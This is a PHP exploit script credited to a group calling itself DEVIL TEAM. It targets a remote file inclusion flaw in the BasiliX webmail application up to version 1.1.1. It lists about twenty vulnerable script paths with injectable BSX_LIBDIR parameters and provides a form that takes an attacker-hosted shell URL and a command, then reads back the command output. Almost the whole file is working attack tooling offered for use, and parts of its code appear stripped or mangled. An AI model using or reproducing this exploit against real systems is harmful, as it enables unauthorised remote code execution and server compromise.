/* ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +:+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+#+# #+# #+# ######### ########## ### ########### ########## ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# ### ########## ### ### ### ### +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - BasiliX <= 1.1.1 Remote File Include Exploit + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: BasiliX 1.1.1 - [Script site: http://sourceforge.net/projects/basilix/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam + - Contact: kacper1964@yahoo.pl - or - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus - SkD, nukedclx, Ramzes - - Greetz for all users DEVIL TEAM IRC Channel !! !@ Przyjazni nie da sie zamienic na marne korzysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ $cmd = $_POST["cmd"]; $glowna = $_POST["glowna"]; $shell = $_POST["shell"]; $exp= "BasiliX <= 1.1.1 Remote File Include Exploit :: DEVIL TEAM :: The Best Polish Team ::" ."
" ."
" ."

script url: (ex. http://www.site.com/[BasiliX_path]/files/abook.php3?BSX_LIBDIR=)
" ."

or
" ."

http://www.site.com/[BasiliX_path]/files/compose-attach.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/compose-menu.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/compose-new.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/compose-send.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/folder-create.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/folder-delete.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/folder-empty.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/folder-rename.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/folders.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/login.php3err=hack&BSX_HTXDIR=
" ."

http://www.site.com/[BasiliX_path]/files/mbox-action.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/mbox-list.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-delete.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-forward.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-header.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-print.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-read.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-reply.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-replyall.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/message-search.php3?BSX_LIBDIR=
" ."

http://www.site.com/[BasiliX_path]/files/settings.php3?BSX_LIBDIR=
" ."" ."
" ."shell url: (ex. http://www.site.com/[path]/shell.txt?) shell.txt (CHMOD 777)
" ."" ."
" ."cmd: (ex. ls -la)
" ."" ."
" ."" ."

" ."

Find by: Kacper (a.k.a Rahim)
" ."
" ."DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
" ."
" ."Contact: kacper1964@yahoo.pl
" ."or

" ."

http://www.rahim.webd.pl/

" ."

 

" ."
" ."

Z Dedykacja dla osoby,
" ."bez ktorej nie mogl bym zyc...
" ."K.C:* J.M (a.k.a Magaja)

" ."

 

" ."

Special Greetz: DragonHeart ;-)
" ."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi
" ."SkD, nukedclx, Ramzes
" ."
" ."Greetz for all users DEVIL TEAM IRC Channel !!
" ."!@ Przyjazni nie da sie zamienic na marne korzysci @!

" ."
" ."

 

" ."
"; if (!isset($_POST['submit'])) { echo $exp; }else{ $file = fopen ("shell.txt", "w+"); fwrite($file, ''); fclose($file); $file = fopen ($shell, "r"); if (!$file) { echo "

Don't Find shell :( Insert in FTP shell.txt.\n"; exit; } echo $exp; while (!feof ($file)) { $line .= fgets ($file, 1024)."
"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); }